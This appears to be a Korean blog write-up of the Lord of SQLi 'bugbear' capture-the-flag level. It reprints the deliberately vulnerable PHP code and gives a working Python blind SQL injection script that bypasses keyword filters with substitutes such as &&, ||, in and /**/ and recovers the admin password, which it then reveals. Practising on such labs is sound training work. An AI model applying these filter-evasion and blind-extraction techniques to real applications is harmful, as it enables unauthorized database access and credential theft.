[LOS] bugbear 풀이

 

PHP & query 
<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~"); 
  if(preg_match('/\'/i', $_GET[pw])) exit("HeHe"); 
  if(preg_match('/\'|substr|ascii|=|or|and| |like|0x/i', $_GET[no])) exit("HeHe"); 
  $query = "select id from prob_bugbear where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_bugbear where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("bugbear"); 
  highlight_file(__FILE__); 
?>
select id from prob_bugbear where id='guest' and pw='' and no=

 

문제 풀이

더보기
solve 조건
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("bugbear");

 Blind Injection 문제이다

 

 

특수문자 제약
if(preg_match('/\'/i', $_GET[pw])) exit("HeHe"); 
if(preg_match('/\'|substr|ascii|=|or|and| |like|0x/i', $_GET[no])) exit("HeHe");

 

 [and,or] => [&&,||] ,[like] => [in], [ ] = [/**/], [']=>["] 로 각각 치환한다

 

Python code
import requests

URL='https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php'
headers = {'Content-Type': 'application/json; charset=utf-8'}
cookies = {'PHPSESSID': '내 쿠기 값'}
password = ''
length=0;
'''
for i in range(100):
    query={'no': '-1/**/||/**/instr/**/(id,"admin")/**/&&/**/length(pw)>'+str(i)}
    res=requests.get(URL, params=query, headers=headers, cookies=cookies)
    if('Hello admin' in res.text):
        print(i)
        length=i;
'''   
    
for i in range(8):
    for j in range(ord('0'),ord('z')+1):
        query={'no': '-1/**/||/**/instr/**/(id,"admin")/**/&&/**/left(pw,'+str(i+1)+')/**/in/**/(\"' +password + chr(j)+ '\")#'}
        res=requests.get(URL, params=query, headers=headers, cookies=cookies)
        if('Hello admin' in res.text):
            password = password + chr(j)
            print(password)
            break;


#no=-1/**/||/**/instr/**/(id,"admin")/**/length(pw)<=i
#-1/**/||/**/instr/**/(id,"admin")/**/&&/**/left(pw,1)/**/in/**/("5")#

 

 

URL

los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php?pw=52dc3991

 

 

 

 

'CTF > LOS' 카테고리의 다른 글

[LOS] assassin 풀이 - 15번  (0) 2020.09.16
[LOS] glant 풀이- 14번  (0) 2020.09.16
[LOS] darkknight 풀이 - 12번  (0) 2020.09.16
[LOS] golem 풀이 - 11번  (0) 2020.09.16
[LOS] skeleton 풀이 - 10번  (0) 2020.09.15

+ Recent posts

티스토리툴바